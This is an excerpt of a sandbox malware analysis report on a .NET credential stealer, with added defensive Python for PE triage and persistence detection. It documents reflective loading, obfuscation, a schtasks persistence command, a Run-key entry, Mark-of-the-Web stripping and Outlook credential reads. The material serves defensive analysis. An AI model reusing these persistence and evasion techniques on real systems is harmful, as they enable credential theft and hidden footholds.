                    Source: C:\Users\user\Desktop\AWB#150332.exe - File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles (Outlook profile store; the injected RegSvcs.exe reads it for stored mail account credentials)
                    Source: AWB#150332.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (CLR header present, i.e. a .NET assembly)
                    Source: AWB#150332.exe - Static file information: File size 1061896 > 1048576
                    Source: AWB#150332.exe - Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: AWB#150332.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: yOCXb.pdbSHA256N source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr
                    Source: Binary string: yOCXb.pdb source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr
                    Source: Binary string: RegSvcs.pdb, source: boqXv.exe, 00000016.00000000.1353896187.0000000000BD2000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
                    Source: Binary string: RegSvcs.pdb source: boqXv.exe, 00000016.00000000.1353896187.0000000000BD2000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr

                    Data Obfuscation

                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ggDhDq4tlwpXTjQJB8.cs - .Net Code: FndLkE8bOT System.Reflection.Assembly.Load(byte[]) (loads a second-stage assembly from a byte array in memory, so the payload never touches disk)
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.cs - .Net Code: FndLkE8bOT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.AWB#150332.exe.7420000.6.raw.unpack, L2.cs - .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: AWB#150332.exe - Static PE information: 0xCA399BA7 [Tue Jul 6 04:57:11 2077 UTC] (compile timestamp lies in the future; the header value was forged or randomised)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 9_2_02D1A3E8 pushad ; retf 052Fh - 9_2_02D1A4A1
                    Source: AWB#150332.exe - Static PE information: section name: .text entropy: 7.195168556276966 (close to the 8.0 maximum; consistent with an encrypted or compressed embedded payload)
                    Source: nYNBzxFhCu.exe.0.dr - Static PE information: section name: .text entropy: 7.195168556276966
                    Both unpacked memory dumps (0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack) contain the same assembly and produce identical hits, so each class is listed once:
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, Hodnf3fmJ0F1pgLDTA.cs - High entropy of concatenated method names: 'Hr2IPv9SDESMrksDkBH', 'E2BhJA9WmU2rDnisdP7', 'XBCerRlEbZ', 'njCeYXGpKL', 'FK5envoTTl', 'RgRYnJ97slYHGWvVsdW', 'wqR3Uf9Bqct0AnKpdVO', 'jsBAEb9ffunvCaiHTHr'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, at3b3xmnGyEskGCHyA.cs - High entropy of concatenated method names: 'l0UYyBHndE', 'Ag8YaBFPgq', 'NkwYYqjtOW', 'SNPYxpLycQ', 'd5BY8O0fJb', 'SWUYGEBrXR', 'Dispose', 'vRmriPuNYL', 'yvBrdx4QqL', 'rYorO08S06'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, S2Iy5WlxSJyE8NUWu6.cs - High entropy of concatenated method names: 'DBeDMDoEqM', 'UdmD3qOcSX', 'e8KOKWaDYq', 'kobOpmgFhZ', 'bQ5OQmWr6Q', 'C5GO90qMGY', 'RmvO01N0mA', 'QkQOts8K0W', 'QGeOCfdqOT', 'JPoOSNGcp9'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, rVI1acIAgv2sATTDcU.cs - High entropy of concatenated method names: 'rPxySgcyt2', 'rSqy7QfEuk', 'zhOyItoTCj', 'QUSyFQHn27', 'yu0yfaovdt', 'WvsyKAI2F7', 'ulDypZ2WGR', 'tnNyQmqGwA', 'PM3y9RqXf8', 'eFIy0QNdTN'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, tv0t2LuCEkxATlJfYn.cs - High entropy of concatenated method names: 'cf0kQgLVk', 'tA8HAEqOW', 'AWTP9sZKj', 'HKM3UiZWj', 'odwoOUMK2', 'yg2lttQgl', 'YUbaQplFGvkLnXSxBI', 'uhbY6kuE2k1uSL5RcI', 'AsLPukNJN5dFi0y5vJ', 'qcFrkuvmM'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, ar6Pr7jX4JwtBS6ZWHN.cs - High entropy of concatenated method names: 'g5qxTUynVE', 'Ov9xz1aTPv', 'J63vcautjh', 'vHdJwr0MWHTHSyrFWQn', 'X0YiRP0490HSk7A9bKA', 'bD0uAP0e7hVpas0bq66', 'mGIUaR0yOkMs1vVsfRl'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, zJo1a8jj7x8frZOqKMX.cs - High entropy of concatenated method names: 'WifnTNXdbx', 'WBgnzwwwXw', 'U1kxcCJf8j', 'qEoxjH4JCM', 'qD9xuxZoMd', 'ixHxXaTG2o', 'JdvxLnswh2', 'QKdxBF7pg6', 'FadxiGADwY', 'BakxdtUeIx'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.cs - High entropy of concatenated method names: 'iB3XBZMY5j', 'PGQXiK3exq', 'IomXdQhfYm', 'iVtXOUPK1J', 'Dg7XDQF5bQ', 'TiBXegijI2', 'v9XXVpsjc7', 'CGxX4xaXDK', 'x3dXRxbhRQ', 'sgkXWtNxB8'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, l6JybvqVYHBQ8kMRwb.cs - High entropy of concatenated method names: 'YqueB7NyPL', 'cd3edw2E4i', 'vM1eDyGYDh', 'cNMeVGNFST', 'oEme4SogFh', 'khuDJXrQh3', 'NbCD6qELH4', 'klJDmoHTyn', 'ktFDANUwdP', 't0JDwoLluN'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, s03LTHjLA1w2jfFCrUN.cs - High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jpMvYRoapQ', 'TmOvn6HyeJ', 'XntvxtGyLW', 'Q9UvvoPGgi', 'FMCv8fQVqj', 'p96vEpk0Xg', 'NmmvGWBiUm'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, lDP3Ch5EoLPVd32YXa.cs - High entropy of concatenated method names: 'AcCNsCJHXq', 'RUNNoqqYpW', 'akNNq1h4w6', 'FKyNfNfmIu', 'svUNpLkl1k', 've4NQdZIsa', 'hH6N0kbGSW', 'NBUNt62BbB', 'bHiNSOLf4R', 'pulNgybfQo'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, Utb578L46Zwqhd8BDt.cs - High entropy of concatenated method names: 'P6UjVoMJA2', 'qKUj4L4yKF', 'da3jWKR8ii', 'G7LjhE22Iy', 'nUWjyu6R6J', 'obvjbVYHBQ', 'N7rtCWv7Xkbkau7Hmb', 'py5GqgbUI2idP8Wio1', 'WWijjf4SDk', 'mHAjXO9fGv'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, mMGN2r0W9pGxDAdddf.cs - High entropy of concatenated method names: 'Ac2Viu4yE4', 'DTNVO7IkuR', 'aqNVe7uEMV', 'vBHeT7JH3y', 'H97ezVLmdr', 'CGeVcFT0bc', 'hGRVjvkR0N', 'x3tVunIlib', 'ssKVXo2f2c', 'PVmVLiYbU5'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, SEWwdLoa3KR8iiq7LE.cs - High entropy of concatenated method names: 'fwuOHu0OOF', 'CkaOPileGJ', 'fnROs6ucse', 'QlpOoFRxog', 'OZvOyarxo6', 'lDHObnJkRD', 'jGuOaiA2Xv', 'Vu0OrAvRyv', 'OqtOYnIsAr', 'QeyOndePFR'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, uNECFgwj2YbtqBbAwF.cs - High entropy of concatenated method names: 'G66YqN3K3V', 'VoQYf9qIw7', 'yf8YKIwbDa', 'gf8YpMdfbw', 'ypcYQJlxRp', 'YE1Y99U2vc', 'pwwY0fraW4', 'N50YtktbYm', 'FI4YCSnmTO', 'YR1YSm5JT7'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, n3gSsCzwftoMMITv1Q.cs - High entropy of concatenated method names: 'w6bnPlj3na', 'LWWnsG2iFx', 'fdnnocT5X4', 'byvnq3L1Qj', 'IRGnf7P5fE', 'OgUnpRHGLu', 'BFknQy4oiP', 'vACnGcnq1a', 'jeAnUGg0bg', 'RkCn1KAWeC'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, yoMJA2saKUL4yKFFtX.cs - High entropy of concatenated method names: 'yuBdIWgdWg', 'SO0dFCxoHR', 'DIjd2bR8tT', 'vI6dZvyeuJ', 'rCJdJSUuRp', 'hdVd6at2OE', 'ahPdmCZAqt', 'VaFdA2Kgbo', 'YTPdwNUmOG', 'FTedTitXmD'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, kciKXVdSgxq58c4Lp7.cs - High entropy of concatenated method names: 'Dispose', 'oEsjwkGCHy', 'sGXufiekN9', 'AlT5grjPrc', 'XQfjTAnykZ', 'PnXjzExq69', 'ProcessDialogKey', 'HlxucNECFg', 'b2YujbtqBb', 'XwFuupagj6'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, mPjo8m66k5QP2xA7CE.cs - High entropy of concatenated method names: 'SYgaANxflO', 'GvQaTCaviv', 'SpArcoPvQq', 'ImGrjLrjkb', 'dP7agbkCwi', 'e1Ea7ZrQks', 'M8Qa5Fd8jI', 'o79aIWvl2C', 'B2WaFuVxRN', 'V7aa2YrLJR'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack and 0.2.AWB#150332.exe.7540000.7.raw.unpack, qlCC5HCPghi2Lpc6hL.cs - High entropy of concatenated method names: 'kcVVURe2tn', 'TtuV19mhUp', 'fr2VkdhMtf', 'pbNVHJsh3u', 'FpCVMJPQh4', 'RcyVPfcSep', 'XeNV3921v5', 't1SVsKgBE7', 'bVQVoltYc4', 'mQ5Vl1IxBe'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - File created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe (dropped file)
                    Source: C:\Users\user\Desktop\AWB#150332.exe - File created: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe (dropped file)
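The static indicators in this section (a CLR header, the DllCharacteristics set, a compile timestamp in 2077, a .text section at entropy 7.2 and randomised method names) can all be reproduced without a sandbox. The block below is an added example written for this page, not code from the report or from Joe Sandbox: a minimal PE header parser that performs those checks, plus the concatenated-method-name entropy heuristic run over names copied from the findings above. `build_sample_pe` fabricates a small PE32 so the block runs offline; the sample bytes and the 0x8540 DllCharacteristics value are constructed to mirror the findings, not taken from the malware. Pass a file path to run `parse_pe` on a real binary.

```python
import math
import struct
from datetime import datetime, timezone

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF spec; the report shows all four set on the sample.
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
DIR_DEBUG = 6            # IMAGE_DIRECTORY_ENTRY_DEBUG
DIR_COM_DESCRIPTOR = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: a non-zero entry means a CLR (.NET) header


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ordinary x86 code sits around 6, packed or encrypted data approaches 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Read just enough of a PE32/PE32+ header to reproduce the static findings above."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%X" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in PE32 and PE32+
    dirs_off = opt + (96 if magic == 0x10B else 112)          # start of the data directory table
    ndirs = struct.unpack_from("<I", data, dirs_off - 4)[0]   # NumberOfRvaAndSizes
    dirs = [struct.unpack_from("<II", data, dirs_off + 8 * i) for i in range(min(ndirs, 16))]

    def dir_present(index: int) -> bool:
        return index < len(dirs) and dirs[index][0] != 0

    sections = {}
    for i in range(nsections):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections[name.rstrip(b"\0").decode("ascii", "replace")] = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])

    compile_time = datetime.fromtimestamp(timestamp, tz=timezone.utc)
    in_future = compile_time > datetime.now(timezone.utc)
    findings = []
    if in_future:
        findings.append("compile timestamp %s lies in the future: header was forged" % compile_time.date())
    if dir_present(DIR_COM_DESCRIPTOR):
        findings.append("CLR header present (.NET): decompile and look for Assembly.Load(byte[])")
    for name, ent in sections.items():
        if ent > 7.0:
            findings.append("section %s entropy %.2f: packed or encrypted payload likely" % (name, ent))
    return {"timestamp": timestamp, "compile_time": compile_time, "future_timestamp": in_future,
            "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
            "is_dotnet": dir_present(DIR_COM_DESCRIPTOR), "has_debug_dir": dir_present(DIR_DEBUG),
            "sections": sections, "findings": findings}


def identifier_entropy(names) -> float:
    """Entropy of the concatenated method names, the heuristic behind the 'High entropy' hits above."""
    return shannon_entropy("".join(names).encode("ascii", "replace"))


# Method names copied from the report: one renamed class, and framework names the obfuscator had to keep.
OBFUSCATED = ['Hr2IPv9SDESMrksDkBH', 'E2BhJA9WmU2rDnisdP7', 'XBCerRlEbZ', 'njCeYXGpKL',
              'FK5envoTTl', 'RgRYnJ97slYHGWvVsdW', 'wqR3Uf9Bqct0AnKpdVO', 'jsBAEb9ffunvCaiHTHr']
NORMAL = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dispose', 'ProcessDialogKey']


def build_sample_pe(text: bytes, timestamp: int, dll_chars: int = 0x8540) -> bytes:
    """Constructed minimal PE32 (not the malware): one .text section, debug and CLR directory entries set."""
    file_align = 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0xE0, 0x0102)
    dirs = [(0, 0)] * 16
    dirs[DIR_DEBUG] = (0x3000, 28)
    dirs[DIR_COM_DESCRIPTOR] = (0x2000 + len(text), 72)  # any non-zero RVA marks the file as .NET
    opt = struct.pack("<HBBIIIIII", 0x10B, 14, 0, len(text), 0, 0, 0x2000, 0x2000, 0)
    opt += struct.pack("<IIIHHHHHHIIIIHH", 0x400000, 0x1000, file_align,
                       6, 0, 0, 0, 6, 0, 0, 0x4000, file_align, 0, 2, dll_chars)
    opt += struct.pack("<IIIIII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x2000, len(text),
                          file_align, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + opt + section
    return headers.ljust(file_align, b"\0") + text


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(bytes(range(256)) * 4, 0xCA399BA7)
    report = parse_pe(blob)
    print(report["compile_time"], report["dll_characteristics"], report["sections"])
    print("\n".join(report["findings"]))
    print("method-name entropy: obfuscated %.2f, normal %.2f" % (identifier_entropy(OBFUSCATED), identifier_entropy(NORMAL)))
```

The entropy thresholds are triage heuristics, not verdicts: a large embedded resource or a legitimately compressed section also pushes .text above 7, and a future timestamp only tells you the header was edited. The CLR check is the cheap signal that the next step is a decompiler rather than a disassembler.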

                    Boot Survival

                    Source: C:\Users\user\Desktop\AWB#150332.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXv (2 entries)
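The two persistence mechanisms in this section, a scheduled task created from an XML file in the user's Temp directory and an HKCU Run value, are what a responder will want to extract from endpoint telemetry. The block below is an added example, not code from the report: it pulls /TN and /XML out of the schtasks command line logged above, parses an exported task definition, and applies one user-writable-path heuristic to both the task action and Run values. The command line is copied from the report; the task XML body and the Run value command lines are constructed samples (the report gives only the value name boqXv and the dropped file path). Real `schtasks /Query /XML` exports are UTF-16 with a BOM, which `ET.parse(path)` handles directly.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories a legitimate scheduled task or Run value rarely executes from.
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|Temp|ProgramData|Public)\\", re.I)
TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.I)


def parse_schtasks_cmdline(cmdline: str) -> dict:
    """Pull /TN and /XML out of a schtasks.exe command line as seen in process-creation telemetry."""
    def flag(name):
        m = re.search(r"/%s\s+(?:\"([^\"]+)\"|(\S+))" % name, cmdline, re.I)
        return (m.group(1) or m.group(2)) if m else None
    task_name, xml_path = flag("TN"), flag("XML")
    return {
        "task_name": task_name,
        "xml_path": xml_path,
        "create": re.search(r"/Create\b", cmdline, re.I) is not None,
        # Creating a task from a definition file in a temp directory is the dropper tell worth alerting on.
        "xml_from_temp": bool(xml_path and TEMP_DIR.search(xml_path)),
    }


def triage_task_xml(xml_text: str) -> dict:
    """Parse an exported task definition and flag the usual persistence tells."""
    root = ET.fromstring(xml_text)
    commands = [(c.text or "").strip() for c in root.findall(".//t:Actions/t:Exec/t:Command", TASK_NS)]
    triggers_el = root.find("t:Triggers", TASK_NS)
    triggers = [el.tag.split("}")[-1] for el in triggers_el] if triggers_el is not None else []
    hidden = root.findtext("t:Settings/t:Hidden", "false", TASK_NS).strip().lower() == "true"
    reasons = []
    for cmd in commands:
        if USER_WRITABLE.search(cmd):
            reasons.append("action runs from a user-writable directory: %s" % cmd)
    if hidden:
        reasons.append("task is hidden from the Task Scheduler UI")
    if "LogonTrigger" in triggers or "BootTrigger" in triggers:
        reasons.append("starts at logon/boot")
    return {"commands": commands, "triggers": triggers, "hidden": hidden, "reasons": reasons}


def triage_run_values(values: dict) -> list:
    """Apply the same path heuristic to HKCU\\...\\CurrentVersion\\Run name -> command pairs."""
    return [name for name, cmd in values.items() if USER_WRITABLE.search(cmd)]


# Constructed inputs. The command line is the one from the report; the XML body and the Run value
# data are assumptions made for this example.
SCHTASKS_CMDLINE = r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"'
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\user\\AppData\\Roaming\\nYNBzxFhCu.exe</Command></Exec>
  </Actions>
</Task>"""
SAMPLE_RUN_VALUES = {
    "boqXv": r'"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"',
    "OneDrive": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
}

if __name__ == "__main__":
    print(parse_schtasks_cmdline(SCHTASKS_CMDLINE))
    print(triage_task_xml(SAMPLE_TASK_XML))
    print(triage_run_values(SAMPLE_RUN_VALUES))
```

On a live host the same checks map onto `schtasks /Query /XML /TN "Updates\nYNBzxFhCu"` for the task definition and `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` for the Run values; the temp-file XML is usually gone by the time a responder looks, so the command line in the process-creation event is often the only record of where the definition came from.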

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - File opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | delete (2 entries; deleting the Zone.Identifier alternate data stream strips the Mark-of-the-Web from the dropped copy so later launches skip the download warning)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 entries; PowerShell probes installed module manifests while auto-discovering a cmdlet, so these reads are a side effect of the PowerShell command, not BitLocker use)
                    Source: C:\Users\user\Desktop\AWB#150332.exe - Process information set: NOOPENFILEERRORBOX (45 entries; SetErrorMode(SEM_NOOPENFILEERRORBOX) suppresses the missing-file dialog and is set routinely by the .NET runtime and PowerShell hosts, so on its own it carries little weight)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
